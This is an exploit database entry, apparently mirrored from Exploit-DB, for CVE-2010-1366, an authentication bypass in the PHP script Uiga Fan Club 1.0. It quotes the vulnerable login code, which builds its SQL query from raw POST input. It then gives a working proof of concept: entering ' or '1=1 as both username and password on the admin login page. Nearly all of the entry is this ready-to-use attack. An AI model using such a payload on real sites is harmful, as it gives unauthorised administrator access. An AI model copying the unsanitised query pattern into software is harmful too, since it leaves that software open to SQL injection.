[] NeoSense
E X P L O I T S
title author type platform port cve id

Uiga Fan Club 1.0 - Authentication Bypass

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2010-02-26 
date_updated:  
verified: 1 
codes: OSVDB-63734;CVE-2010-1366 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comuigafanclub.zip
# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
###########################################################################
# Author: cr4wl3r
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
###########################################################################
#if (isset($_POST['admin_name']))
# {
# $admin_name=$_POST['admin_name'];
# $admin_password=$_POST['admin_password'];
#
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# }
#
#
# else
# {
# $sql="SELECT *
# 	   FROM admin
#	   WHERE admin_name='$admin_name' and admin_password='$admin_password'";
#
###########################################################################

###############################################
PoC: [path]/admin/admin_login.php

     Username: ' or '1=1
     password: ' or '1=1
###############################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.